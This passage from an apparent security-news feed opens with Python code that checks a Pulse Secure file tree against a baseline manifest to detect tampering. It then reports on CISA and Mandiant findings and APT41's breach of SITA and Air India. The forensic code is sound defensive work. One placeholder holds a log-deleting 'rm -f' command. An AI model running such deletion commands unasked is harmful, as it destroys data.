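    Run this against a mounted image or an exported copy of the file system,
    not on the suspect device itself, whose own binaries cannot be trusted.
    """
    tree: Dict[str, bytes] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                tree[rel] = fh.read()
    return tree


# Constructed stand-ins using file names from the CISA list; contents and
# directory layout are placeholders, not the real appliance files.
BASELINE_TREE: Dict[str, bytes] = {
    "dana-na/auth/licenseserverproto.cgi": b"#!/usr/bin/perl\n# license proto\n",
    "dana-na/auth/healthcheck.cgi": b"#!/usr/bin/perl\n# health check\n",
    "dana-na/meeting/meeting_testjs.cgi": b"#!/usr/bin/perl\n# meeting test\n",
    "perl5/lib/DSUpgrade.pm": b"package DSUpgrade;\n1;\n",
    "bin/clear_log.sh": b"#!/bin/sh\nrm -f /var/log/*.old\n",
}

# The same tree as it might look after an intrusion of the kind CISA describes:
# two scripts altered, the log utility gone, one new file dropped.
SUSPECT_TREE: Dict[str, bytes] = {
    "dana-na/auth/licenseserverproto.cgi": BASELINE_TREE["dana-na/auth/licenseserverproto.cgi"],
    "dana-na/auth/healthcheck.cgi": BASELINE_TREE["dana-na/auth/healthcheck.cgi"],
    "dana-na/meeting/meeting_testjs.cgi": b"#!/usr/bin/perl\n# meeting test\n# constructed extra code block\n",
    "perl5/lib/DSUpgrade.pm": b"package DSUpgrade;\n# constructed extra code block\n1;\n",
    "dana-na/auth/extra.cgi": b"#!/usr/bin/perl\n# constructed new file\n",
}


if __name__ == "__main__":
    result = verify_tree(build_manifest(BASELINE_TREE), SUSPECT_TREE)
    for kind, paths in result.items():
        for path in paths:
            print(f"{kind:9s} {path}")
```

The manifest has to come from a trusted source (the vendor's package for the exact firmware version, or a vendor-supplied integrity checker), and the comparison should be run from a clean host over an exported copy of the file system; a check performed on the compromised appliance with its own tools proves nothing, since the attacker who altered DSUpgrade.pm could equally have altered the hashing utility.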

An earlier report by security firm Mandiant had likewise documented multiple incidents involving the modification of legitimate Pulse Secure files. Mandiant attributed that campaign to a Chinese APT group exploiting CVE-2021-22893 and noted that the attackers modified Pulse Secure system files to harvest the credentials of affected users.

The Agency concluded its report by listing some security recommendations to mitigate the risk of attack:

  • Keep signatures and antivirus solutions up-to-date
  • Keep your operating system up to date
  • Disable file and printer sharing services or, where they are needed, protect them with strong passwords or Active Directory authentication
  • Restrict users’ permissions to install and run unwanted software applications and maintain a small number of administrative users

How Chinese hackers gained access to Air India’s network and customer database
https://www.securitynewspaper.com/2021/06/14/how-chinese-hackers-gained-access-to-air-indias-network-and-customer-database/ (Mon, 14 Jun 2021 22:35:01 +0000)

A severe cyberattack was recently detected against SITA, a company that provides IT services to more than 90% of the world’s airlines. The incident led to a massive data breach affecting more than 4 million people and was attributed to a Chinese threat group tracked as APT41.

The incident, reported in early March, affected major carriers such as Singapore Airlines and Malaysia Airlines, although the full list of affected carriers had not been disclosed at the time. This week, Air India confirmed that its systems were compromised in the attack.

Nikita Rostovcev, a security analyst at Group-IB, reported on the incident and shared details of the hackers’ activity.

Air India first acknowledged the incident in late May, but little was known about its scope until Group-IB linked it to the SITA compromise. According to Rostovcev, it took the attackers only 24 hours after the initial compromise to spread the Cobalt Strike payload across the affected network.

Shortly after the airline confirmed the intrusion, a post appeared on the dark web offering for sale a database allegedly belonging to Air India. The sellers demanded USD 3,000 for access to the compromised data.

Although initial analyses suggested the leak was not legitimate, a subsequent investigation confirmed that the database was real and that the information had been extracted by a hacking group sponsored by an unnamed state. The investigation also showed that the hackers exfiltrated Air India data to a command-and-control (C&C) server and then moved laterally through the compromised network; Group-IB identified at least 20 devices on the Air India network infected during the attack.

As for the attacking group, APT41 specializes in cyber espionage and financially motivated fraud. A recent U.S. Department of Justice (DOJ) report notes that over the previous 12 months the group supplied other groups with source code, signing certificates and other information needed to mount multiple attacks.
